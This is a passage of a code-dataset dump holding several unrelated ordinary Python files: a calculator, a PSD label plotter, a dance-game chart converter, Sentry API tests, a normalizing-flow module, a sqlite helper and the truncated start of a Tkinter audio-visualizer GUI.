input(\">>> \")\n # Input enter key\n if (cmd == ''):\n continue\n\n if (cmd.lower() == 'q'):\n break\n\n try:\n # eval func: string to expression\n print(eval(cmd))\n except:\n print(\"\\033[1;31mExpression error, please input again.\\033[0m\")\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"calc/calc-cmd.py","file_name":"calc-cmd.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175167395","text":"import psd_tools.reader\nimport psd_tools.decoder\nfrom psd_tools.constants import TaggedBlock, SectionDivider, ImageResourceID\nimport matplotlib.pyplot as plt\n\nimage_path = '../psd/Case_204_G11_40.psd'\n#image_path = './Case_271_O6_40.psd'\n#image_path = '/./Case_322_I3_40.psd'\nim = plt.imread(image_path)\n\nwith open(image_path, 'rb') as fp:\n binary = psd_tools.reader.parse(fp)\n decoded = psd_tools.decoder.parse(binary)\n\nimg_dict = decoded.image_resource_blocks\nfor item in img_dict:\n if item.resource_id == 1080:\n count_data=item\n\ncount_level = count_data.data.descriptor.items[1][1][0]\nid_list = [str(item.items[3][1].value) for item in count_level]\nnum_labels = len(id_list)\n\nraw_data_pos_dict = {}\nfor i in range(num_labels):\n raw_data_pos_dict[id_list[i]] = count_level[i].items[7][1].items\n\ndata_pos_dict = {}\nfor key,value in raw_data_pos_dict.items(): #In python 2.7 this was .iteritems()\n data_pos_dict[key] = [[float(point.items[0][1].value),float(point.items[1][1].value)] for point in value]\n\nprint (data_pos_dict.keys())\nprint ([len(data_pos_dict[key]) for key in data_pos_dict])\nchoice1 = data_pos_dict[list(data_pos_dict.keys())[0]] # In python 2.7 this was choice1 = data_pos_dict[data_pos_dict.keys()[0]]\nx1,y1 = [i[0] for i in choice1],[i[1] for i in choice1]\nchoice2 = data_pos_dict[list(data_pos_dict.keys())[1]]\nx2,y2 = [i[0] for i in choice2],[i[1] for i in choice2]\nchoice3 = data_pos_dict[list(data_pos_dict.keys())[2]]\nx3,y3 = [i[0] for i in choice3],[i[1] for i in choice3]\nchoice4 = data_pos_dict[list(data_pos_dict.keys())[3]]\nx4,y4 = [i[0] for i in choice4],[i[1] for i in choice4]\n\nimplot = plt.imshow(im)\nplt.scatter(x1,y1,s=4,c='r')\nplt.scatter(x2,y2,s=4,c='c')\nplt.scatter(x3,y3,s=4,c='violet')\nplt.scatter(x4,y4,s=4)\nplt.show()\n","sub_path":"labels/psd_parse_and_plot.py","file_name":"psd_parse_and_plot.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"625005140","text":"import glob\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\nimport hexdump\r\n\r\nUSE_TIMESIGS = False\r\n\r\ndef read_string(data, offset):\r\n string_bytes = data[offset:data.index(b'\\0', offset)]\r\n return string_bytes.decode('shift-jis').strip('\\0')\r\n\r\n\r\ndef convert_raw_chart(found_charts, song_info=None):\r\n song_id = song_info['song_id']\r\n bpm = song_info['bpm']\r\n\r\n # Parse ttb file for timestamps\r\n ttb_path = os.path.join(\"raw_data_dct\", \"ttb%03d02.bin\" % song_id)\r\n ttb_by_measure = {}\r\n ttb_data = bytearray(open(ttb_path, \"rb\").read())\r\n ttb_header = ttb_data[:8]\r\n ttb_data = ttb_data[8:]\r\n\r\n measure_timestamps = {}\r\n cur_bars = 0\r\n\r\n bpms = {0: 0}\r\n\r\n song_offset_time = int.from_bytes(ttb_data[2:4], 'little')\r\n song_offset = (((song_offset_time * 441) / 75) * 100) / 44100\r\n song_offset = -song_offset\r\n\r\n timing_info_by_bar = {}\r\n requires_timing_info = False\r\n last_time_sig = None\r\n measure_to_beat = {}\r\n last_measure = 0\r\n\r\n cur_bar_len = 4\r\n for i in range(4, len(ttb_data) - 4, 4):\r\n prev_bar_len = cur_bar_len\r\n cur_time = int.from_bytes(ttb_data[i+2:i+4], 'little')\r\n prev_time = int.from_bytes(ttb_data[i+2-4:i+4-4], 'little')\r\n cur_bar_len = int.from_bytes(ttb_data[i-4:i+2-4], 'little')\r\n\r\n cur_timestamp = (((cur_time * 441) / 75) * 100) / 44100\r\n prev_timestamp = (((prev_time * 441) / 75) * 100) / 44100\r\n\r\n if song_offset is None:\r\n song_offset = -prev_timestamp\r\n\r\n d = (cur_bar_len / 4) * 4 if USE_TIMESIGS else 4\r\n cur_bpm = 1 / (((cur_timestamp - prev_timestamp) * (1000 / d)) / 60000)\r\n\r\n # print(cur_bars, \"%04x (%f) %04x (%f)\" % (prev_time, prev_timestamp, cur_time, cur_timestamp), cur_bpm, cur_bar_len)\r\n\r\n if last_time_sig is None or cur_bar_len != last_time_sig:\r\n timing_info_by_bar[cur_bars] = cur_bar_len\r\n last_time_sig = cur_bar_len\r\n\r\n if cur_bar_len != 4:\r\n requires_timing_info = True\r\n\r\n bpms[cur_bars] = cur_bpm\r\n cur_bars += cur_bar_len if USE_TIMESIGS else 4\r\n\r\n if cur_bar_len != 4:\r\n print(\"Found bar of %d in %s\" % (cur_bar_len, song_info['title']))\r\n\r\n ### Handle conversion of chart\r\n chart = \"\"\"#TITLE:%s;\r\n#MUSIC:bgm.mp3;\r\n#PREVIEW:preview.mp3;\r\n#OFFSET:%lf;\r\n#BPMS:%s;\r\n#DISPLAYBPM:%d;\r\n\"\"\" % (song_info.get('title', '(Untitled)'), song_offset, \",\".join([\"%d=%f\" % (k, bpms[k]) for k in bpms]), song_info.get('bpm', 128))\r\n\r\n if requires_timing_info and USE_TIMESIGS:\r\n chart += \"#TIMESIGNATURES:%s;\" % (\",\".join([\"%d=%d=4\" % (k, timing_info_by_bar[k]) for k in timing_info_by_bar]))\r\n\r\n for idx, data in found_charts:\r\n valid_charts = [0, 1, 2, 7, 8]\r\n\r\n if idx not in valid_charts:\r\n continue\r\n\r\n chart_type = {\r\n 0: \"dance-single\",\r\n 1: \"dance-single\",\r\n 2: \"dance-single\",\r\n 3: \"dance-couple\",\r\n 4: \"dance-couple\",\r\n 5: \"dance-couple\",\r\n 7: \"dance-double\",\r\n 8: \"dance-double\",\r\n }[idx]\r\n\r\n chart_diff = {\r\n 0: \"Easy\",\r\n 1: \"Medium\",\r\n 2: \"Hard\",\r\n 3: \"Easy\",\r\n 4: \"Medium\",\r\n 5: \"Hard\",\r\n 7: \"Easy\",\r\n 8: \"Medium\",\r\n }[idx]\r\n\r\n diff_rating = {\r\n 0: song_info['diffs']['single']['basic'],\r\n 1: song_info['diffs']['single']['trick'],\r\n 2: song_info['diffs']['single']['maniac'],\r\n 3: song_info['diffs']['couple']['basic'],\r\n 4: song_info['diffs']['couple']['trick'],\r\n 5: song_info['diffs']['couple']['maniac'],\r\n 7: song_info['diffs']['double']['basic'],\r\n 8: song_info['diffs']['double']['trick'],\r\n }[idx]\r\n\r\n chunks = [data[i:i+8] for i in range(0, len(data), 8)]\r\n events = []\r\n last_measure = 0\r\n\r\n for chunk in chunks:\r\n def get_arrows_str(n):\r\n s = \"\"\r\n s += \"1\" if (n & 8) else \"0\"\r\n s += \"1\" if (n & 4) else \"0\"\r\n s += \"1\" if (n & 2) else \"0\"\r\n s += \"1\" if (n & 1) else \"0\"\r\n return s\r\n\r\n measure = chunk[2]\r\n beat = chunk[3]\r\n cmd = int.from_bytes(chunk[4:], 'little')\r\n\r\n beat = round((beat / 256) * 192)\r\n\r\n event = {\r\n 'measure': measure,\r\n 'beat': beat,\r\n }\r\n\r\n if cmd == 4:\r\n # Is a note\r\n p1_note = chunk[0]\r\n p2_note = chunk[1]\r\n\r\n p1_str = get_arrows_str(p1_note)\r\n p2_str = get_arrows_str(p2_note)\r\n\r\n note_data = p1_str\r\n\r\n if chart_type == \"dance-single\":\r\n if p2_note != 0:\r\n print(\"P2 note has data for single chart\")\r\n # exit(1)\r\n\r\n else:\r\n note_data += p2_str\r\n\r\n event['cmd'] = 'note'\r\n event['data'] = note_data\r\n\r\n elif cmd == 0x100:\r\n # End song\r\n event['cmd'] = 'end'\r\n last_measure = measure + 1\r\n\r\n else:\r\n print(\"Unknown cmd value\", cmd)\r\n exit(1)\r\n\r\n events.append(event)\r\n\r\n if song_info is None:\r\n song_info = {}\r\n\r\n measure_data = {}\r\n for i in range(last_measure):\r\n measure_data[i] = []\r\n\r\n measure_data = {}\r\n for event in events:\r\n if event['cmd'] != \"note\":\r\n continue\r\n\r\n if event['measure'] not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[event['measure']] = [d] * 192\r\n\r\n # print(event['beat'], len(measure_data[event['measure']]))\r\n measure_data[event['measure']][event['beat']] = event['data']\r\n\r\n for i in range(last_measure):\r\n if i not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[i] = [d]\r\n\r\n arrow_data = \"\\n,\\n\".join([\"\\n\".join(measure_data[k]) for k in sorted(list(measure_data.keys()))])\r\n\r\n chart +=\"\"\"\r\n#NOTES:\r\n %s:\r\n :\r\n %s:\r\n %d:\r\n 0,0,0,0,0:\r\n%s\r\n;\"\"\" % (chart_type, chart_diff, diff_rating, arrow_data)\r\n\r\n return chart\r\n\r\n\r\n\r\nsonglist_info = {}\r\ndata = bytearray(open(\"dct.exe\", \"rb\").read())\r\n\r\nbase_diff = 0x8000f800\r\nsonglist_offset = 0x4d48\r\nsong_count = 0x340 // 0x40\r\n\r\nfor i in range(0, song_count * 0x40, 0x40):\r\n chunk = data[songlist_offset+i:songlist_offset+i+0x40]\r\n\r\n song_id = int.from_bytes(chunk[0x06:0x08], 'little')\r\n is_unlocked = chunk[0]\r\n unk_flag = chunk[1]\r\n timing_type = int.from_bytes(chunk[2:4], 'little')\r\n audio_idx = chunk[0x15]\r\n bpm = int.from_bytes(chunk[0x04:0x06], 'little')\r\n\r\n diffs = {\r\n 'single': {\r\n 'basic': int.from_bytes(chunk[0x24:0x24+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x26:0x26+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x28:0x28+2], 'little') / 2,\r\n },\r\n 'double': {\r\n 'basic': int.from_bytes(chunk[0x34:0x34+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x36:0x36+2], 'little') / 2,\r\n },\r\n 'couple': {\r\n 'basic': int.from_bytes(chunk[0x2c:0x2c+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x2e:0x2e+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x30:0x30+2], 'little') / 2,\r\n },\r\n }\r\n\r\n title_ptr = int.from_bytes(chunk[8:8+4], 'little') - base_diff\r\n title = read_string(data, title_ptr)\r\n\r\n artist_ptr = int.from_bytes(chunk[12:12+4], 'little') - base_diff\r\n artist = read_string(data, artist_ptr)\r\n\r\n image_ptr = int.from_bytes(chunk[16:16+4], 'little') - base_diff\r\n image = read_string(data, image_ptr)\r\n\r\n songlist_info[song_id] = {\r\n 'song_id': song_id,\r\n 'title': title,\r\n 'artist': artist,\r\n 'title_image': image,\r\n 'diffs': diffs,\r\n 'bpm': bpm,\r\n 'timing_type': timing_type,\r\n 'is_unlocked': is_unlocked,\r\n 'bgm_filename': \"D%04d.MP3\" % (audio_idx - 2),\r\n 'preview_filename': \"D%04d.MP3\" % (audio_idx - 28),\r\n }\r\n\r\n print(title)\r\n hexdump.hexdump(chunk)\r\n print()\r\n\r\n\r\nfor filename in glob.glob(\"raw_data_dct/seq*.bin\"):\r\n data = bytearray(open(filename, \"rb\").read())\r\n\r\n header = data[:0x78]\r\n data = data[0x78:]\r\n\r\n found_charts = []\r\n for i in range(0, len(header), 0x0c):\r\n idx = i // 0x0c\r\n exists = int.from_bytes(header[i:i+4], 'little')\r\n length = int.from_bytes(header[i+4:i+8], 'little') * 8\r\n offset = int.from_bytes(header[i+8:i+12], 'little') * 8\r\n\r\n if exists == 0:\r\n assert(length == 0 and offset == 0)\r\n continue\r\n\r\n # print(\"%d %d %04x %04x | %08x -> %08x (%08x)\" % (idx, exists, length, offset, offset, offset + length, len(data)))\r\n\r\n chart_data = data[offset:offset+length]\r\n found_charts.append((idx, chart_data))\r\n\r\n if len(found_charts) != 5:\r\n print(\"Found %d charts in %s\" % (len(found_charts), filename))\r\n\r\n basename = os.path.splitext(os.path.basename(filename))[0]\r\n song_id = int(basename[3:6], 10)\r\n\r\n song_info = songlist_info.get(song_id, None)\r\n if song_info is not None:\r\n basename = song_info['title']\r\n\r\n else:\r\n song_info = {\r\n 'title': \"Unknown\",\r\n 'song_id': song_id,\r\n 'bpm': 128,\r\n 'diffs': {\r\n 'single': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n 'double': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n },\r\n 'couple': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n }\r\n }\r\n\r\n basepath = os.path.join(\"charts_output_dct\", basename)\r\n os.makedirs(basepath, exist_ok=True)\r\n\r\n for idx, chart in found_charts:\r\n chart_mapping = {\r\n 0: \"single_basic.bin\",\r\n 1: \"single_trick.bin\",\r\n 2: \"single_maniac.bin\",\r\n 3: \"couple_basic.bin\",\r\n 4: \"couple_trick.bin\",\r\n 5: \"couple_maniac.bin\",\r\n 7: \"double_basic.bin\",\r\n 8: \"double_trick.bin\",\r\n }\r\n\r\n chart_filename = chart_mapping.get(idx, \"%02d.bin\" % idx)\r\n\r\n if idx not in chart_mapping:\r\n print(\"Found unknown chart\", idx)\r\n\r\n # open(os.path.join(basepath, chart_filename), \"wb\").write(chart)\r\n\r\n # if \"night\" in song_info['title'].lower():\r\n try:\r\n chart_converted = convert_raw_chart(found_charts, song_info)\r\n open(os.path.join(basepath, \"chart.sm\"), \"w\").write(chart_converted)\r\n except:\r\n print(\"Couldn't convert %s\" % (filename))\r\n\r\n # if song_info is not None:\r\n # # json.dump(song_info, open(os.path.join(basepath, \"_metadata.json\"), \"w\"), indent=4)\r\n\r\n # if 'bgm_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['bgm_filename']), os.path.join(basepath, \"bgm.mp3\"))\r\n\r\n # if 'preview_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['preview_filename']), os.path.join(basepath, \"preview.mp3\"))\r\n\r\n # shutil.copyfile(filename, os.path.join(basepath, os.path.basename(filename)))\r\n\r\n","sub_path":"sys573/tools/parse_charts_dct.py","file_name":"parse_charts_dct.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35834586","text":"from __future__ import absolute_import\n\nfrom django.utils import timezone\nfrom exam import fixture\n\nfrom sentry.api.serializers import serialize\nfrom sentry.models import SavedSearch\nfrom sentry.models.savedsearch import DEFAULT_SAVED_SEARCHES\nfrom sentry.testutils import APITestCase\n\n\nclass OrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def test_simple(self):\n self.login_as(user=self.user)\n team = self.create_team(members=[self.user])\n project1 = self.create_project(teams=[team], name='foo')\n project2 = self.create_project(teams=[team], name='bar')\n\n SavedSearch.objects.create(\n project=project1,\n name='bar',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project2,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n\n included.sort(key=lambda search: (search.name, search.id))\n response = self.get_valid_response(self.organization.slug)\n response.data.sort(key=lambda search: (search['name'], search['projectId']))\n assert response.data == serialize(included)\n\n\nclass OrgLevelOrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def get_response(self, *args, **params):\n params['use_org_level'] = '1'\n return super(OrgLevelOrganizationSearchesListTest, self).get_response(\n *args,\n **params\n )\n\n def create_base_data(self):\n team = self.create_team(members=[self.user])\n SavedSearch.objects.create(\n project=self.create_project(teams=[team], name='foo'),\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n )\n SavedSearch.objects.create(\n organization=self.organization,\n owner=self.create_user(),\n name='foo',\n query='some other user\\'s query',\n date_added=timezone.now().replace(microsecond=0)\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n return included\n\n def check_results(self, expected):\n self.login_as(user=self.user)\n expected.sort(key=lambda search: (not search.is_pinned, search.name.lower()))\n response = self.get_valid_response(self.organization.slug)\n assert response.data == serialize(expected)\n\n def test_simple(self):\n included = self.create_base_data()\n self.check_results(included)\n\n def test_pinned(self):\n included = self.create_base_data()\n pinned_query = SavedSearch.objects.create(\n organization=self.organization,\n owner=self.user,\n name='My Pinned Query',\n query='pinned junk',\n date_added=timezone.now().replace(microsecond=0)\n )\n included.append(pinned_query)\n self.check_results(included)\n # Check a pinned query that uses an existing query correctly filters\n # the existing query\n to_be_pinned = included.pop()\n to_be_pinned.is_pinned = True\n pinned_query.query = to_be_pinned.query\n pinned_query.save()\n included[0] = to_be_pinned\n self.check_results(included)\n","sub_path":"tests/sentry/api/endpoints/test_organization_searches.py","file_name":"test_organization_searches.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"24579028","text":"\n\nfrom xai.brain.wordbase.nouns._madman import _MADMAN\n\n#calss header\nclass _MADMEN(_MADMAN, ):\n\tdef __init__(self,): \n\t\t_MADMAN.__init__(self)\n\t\tself.name = \"MADMEN\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"madman\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_madmen.py","file_name":"_madmen.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169625865","text":"#!/usr/bin/env python3\n\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\n\nclass Sylvester(nn.Module):\n \"\"\"\n Sylvester normalizing flow.\n \"\"\"\n\n def __init__(self, num_ortho_vecs):\n\n super(Sylvester, self).__init__()\n\n self.num_ortho_vecs = num_ortho_vecs\n\n self.h = nn.Tanh()\n\n triu_mask = torch.triu(torch.ones(num_ortho_vecs, num_ortho_vecs), diagonal=1).unsqueeze(0)\n diag_idx = torch.arange(0, num_ortho_vecs).long()\n\n self.register_buffer('triu_mask', torch.Tensor(triu_mask))\n self.triu_mask.requires_grad = False\n self.register_buffer('diag_idx', diag_idx)\n\n def der_h(self, x):\n return self.der_tanh(x)\n\n def der_tanh(self, x):\n return 1 - self.h(x) ** 2\n\n def _forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n \"\"\"\n All flow parameters are amortized. Conditions on diagonals of R1 and R2 for invertibility need to be satisfied\n outside of this function. Computes the following transformation:\n z' = z + QR1 h( R2Q^T z + b)\n or actually\n z'^T = z^T + h(z^T Q R2^T + b^T)R1^T Q^T\n :param zk: shape: (batch_size, z_size)\n :param r1: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param r2: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param q_ortho: shape (batch_size, z_size , num_ortho_vecs)\n :param b: shape: (batch_size, 1, self.z_size)\n :return: z, log_det_j\n \"\"\"\n\n # Amortized flow parameters\n zk = zk.unsqueeze(1)\n\n # Save diagonals for log_det_j\n diag_r1 = r1[:, self.diag_idx, self.diag_idx]\n diag_r2 = r2[:, self.diag_idx, self.diag_idx]\n\n r1_hat = r1\n r2_hat = r2\n\n qr2 = torch.bmm(q_ortho, r2_hat.transpose(2, 1))\n qr1 = torch.bmm(q_ortho, r1_hat)\n\n r2qzb = torch.bmm(zk, qr2) + b\n z = torch.bmm(self.h(r2qzb), qr1.transpose(2, 1)) + zk\n z = z.squeeze(1)\n\n # Compute log|det J|\n # Output log_det_j in shape (batch_size) instead of (batch_size,1)\n diag_j = diag_r1 * diag_r2\n diag_j = self.der_h(r2qzb).squeeze(1) * diag_j\n diag_j += 1.\n log_diag_j = diag_j.abs().log()\n\n if sum_ldj:\n log_det_j = log_diag_j.sum(-1)\n else:\n log_det_j = log_diag_j\n\n return z, log_det_j\n\n def forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n\n return self._forward(zk, r1, r2, q_ortho, b, sum_ldj)\n\n","sub_path":"lib_snf/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109244824","text":"import sqlite3\n\n\nclass DbConnect():\n def __init__(self):\n self.conn = sqlite3.connect('db.sqlite3')\n\n def insertNotifications(self,username,stock,action):\n cur = self.conn.cursor()\n cur.execute(\n 'INSERT INTO myapp_notificationType (username,stock, notificationType) values (?, ?, ?)',\n (username, stock, action))\n self.conn.commit()\n self.conn.close()","sub_path":"myapp/database_connections/db_connections.py","file_name":"db_connections.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"523163995","text":"from FanBlender import FanBlender, __version__\nfrom FanTkImageViewer import ImageViewer\nfrom LanguagePack import *\n\nimport threading, os, pickle, ctypes\nimport tkinter as tk\nfrom tkinter import ttk\nimport tkinter.messagebox\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import scrolledtext\n\n\"\"\"\nAudio Visualizer - GUI\nBy Twitter @FanKetchup\nhttps://github.com/FerryYoungFan/FanselineVisualizer\n\"\"\"\n\n# GUI Language\nlang = lang_en\nlang_code = \"en\"\n\n\n# lang = lang_cn_s\n\ndef clog(content=\"\", insertloc='end'):\n global scr\n scr.configure(state='normal')\n scr.insert(insertloc, content)\n scr.configure(state='disable')\n scr.see(\"end\")\n\n\ndef clearLog():\n global scr\n scr.configure(state='normal')\n scr.delete('1.0', tk.END)\n clog(\"*\" * 35 + \" \" + lang[\"Welcome to use\"] + \" \" + lang[\"Fanseline Audio Visualizer\"] + \"!\" \\\n + \" \" + \"*\" * 35 + \"\\n\\n\")\n clog(lang[\"Project Website: \"] + \"https://github.com/FerryYoungFan/FanselineVisualizer\" + \"\\n\\n\")\n\n\nclass InfoBridge:\n def __init__(self):\n pass\n\n def log(self, content=\"\"):\n clog(content + \"\\n\")\n\n def progressbar(self, value, total):\n global progress\n progress[\"value\"] = (100 * value / total)\n\n def freeze(self, flag=True):\n global isRunning\n if flag:\n fg = \"disabled\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Stop Blending\"]\n isRunning = True\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__ + \" \" + lang[\"(Running)\"])\n else:\n fg = \"normal\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Blend & Export\"]\n isRunning = False\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n elem = [entry_audio, btn_audio, entry_fname, btn_output, entry_img, btn_img, entry_logo, btn_logo,\n entry_text, entry_font, btn_font, entry_width, entry_height, entry_fps, entry_brv, btn_autob,\n entry_low, entry_up, entry_bins, entry_scalar, list_color, list_bra, check_normal, list_preseta,\n list_presetv, entry_output, label_mp4, label_textplz, label_font, label_size, label_mul,\n label_fps, label_brv, label_range, label_to, label_hz, label_bins, label_scalar, label_color,\n label_bra, label_kbps, label_preseta, label_presetv, list_lang, label_lang, label_smooth, list_smooth,\n entry_bg, btn_bg, entry_relsize, check_use_glow, label_bright, entry_bright, label_bg_mode,\n list_bg_mode, label_style, list_style, label_linewidth, entry_linewidth, entry_rotate, label_rotate,\n label_saturation, entry_saturation, label_text_brt, entry_text_brt]\n for el in elem:\n el[\"state\"] = fg\n\n if not flag:\n list_color[\"state\"] = \"readonly\"\n list_preseta[\"state\"] = \"readonly\"\n list_presetv[\"state\"] = \"readonly\"\n list_lang[\"state\"] = \"readonly\"\n list_bg_mode[\"state\"] = \"readonly\"\n list_style[\"state\"] = \"readonly\"\n root_view.withdraw()\n\n def realTime(self, img):\n global frame2\n if frame2.winfo_viewable():\n frame2.imshow(img)\n\n\nimg_format_dict = \"*.jpg *.jpeg *.png *.gif *.bmp *.ico *.dib *.webp *.tiff *.tga\"\n\n\ndef selectImage():\n try:\n global tk_image_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_image_path.set(pathread)\n entry_img.xview(\"end\")\n clog(lang[\"Foreground Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectLogo():\n try:\n global tk_logo_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_logo_path.set(pathread)\n entry_logo.xview(\"end\")\n clog(lang[\"Logo Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectBG():\n try:\n global tk_bg_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_bg_path.set(pathread)\n entry_bg.xview(\"end\")\n clog(lang[\"Background Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectAudio():\n try:\n global tk_sound_path, tk_output_path, tk_filename\n pathread = askopenfilename(\n filetypes=[(lang[\"Audio files\"], \"*.mp3 *.wav *.ogg *.aac *.flac *.ape *.m4a *.m4r *.wma *.mp2 *.mmf\"),\n (lang[\"Video files\"], \"*.mp4 *.wmv *.avi *.flv *.mov *.mkv *.rm *.rmvb\"),\n (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_sound_path.set(pathread)\n entry_audio.xview(\"end\")\n vdic = getAllValues()\n if vdic[\"output_path\"] is None:\n tk_output_path.set(os.path.dirname(os.path.realpath(pathread)).replace(\"\\\\\", \"/\") + \"/\")\n entry_output.xview(\"end\")\n new_name = (os.path.splitext(pathread)[0].split(\"/\")[-1]) + lang[\"_Visualize\"]\n tk_filename.set(new_name)\n entry_fname.xview(\"end\")\n clog(lang[\"Audio Selected: \"])\n clog(tk_sound_path.get() + '\\n')\n except:\n return\n\n\ndef selectOutput():\n try:\n global tk_output_path\n pathexport = askdirectory()\n pathexport = pathexport + '/'\n if not pathexport or pathexport == \"/\":\n return\n else:\n tk_output_path.set(pathexport)\n entry_output.xview(\"end\")\n clog(lang[\"Output Path Selected: \"])\n clog(tk_output_path.get() + '\\n')\n except:\n return\n\n\ndef selectFont():\n global tk_font, tk_text\n try:\n pathread = askopenfilename(filetypes=[(lang[\"Font files\"], \"*.ttf *.otf\"), (lang[\"All files\"], \"*.*\")])\n if not pathread:\n return\n else:\n tk_font.set(pathread)\n entry_font.xview(\"end\")\n clog(lang[\"Font Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef getAllValues():\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, bg_mode_dic, \\\n tk_style, tk_linewidth, style_dic, tk_rotate, tk_saturation, tk_text_brt\n\n def checkStr(strtk):\n if strtk.get():\n return strtk.get()\n else:\n return None\n\n def checkFile(strtk):\n path = checkStr(strtk)\n if path is not None:\n if os.path.exists(path):\n return path\n return None\n\n def checkInt(inttk):\n\n try:\n num = float(inttk.get())\n except:\n return None\n else:\n return int(round(num))\n\n def checkFloat(floattk):\n try:\n num = float(floattk.get())\n except:\n return None\n else:\n return num\n\n if checkStr(tk_filename) is not None:\n fname = checkStr(tk_filename) + \".mp4\"\n else:\n fname = None\n\n param_dict = {\n \"image_path\": checkFile(tk_image_path),\n \"bg_path\": checkFile(tk_bg_path),\n \"sound_path\": checkFile(tk_sound_path),\n \"logo_path\": checkFile(tk_logo_path),\n \"output_path\": checkStr(tk_output_path),\n \"filename\": fname,\n \"text\": checkStr(tk_text),\n \"font\": checkStr(tk_font),\n \"text_brt\": checkFloat(tk_text_brt),\n\n \"bins\": checkInt(tk_bins),\n \"lower\": checkInt(tk_fq_low),\n \"upper\": checkInt(tk_fq_high),\n \"color\": color_dic[checkStr(list_color)],\n \"scalar\": checkFloat(tk_scalar),\n \"smooth\": checkInt(tk_smooth),\n \"bright\": 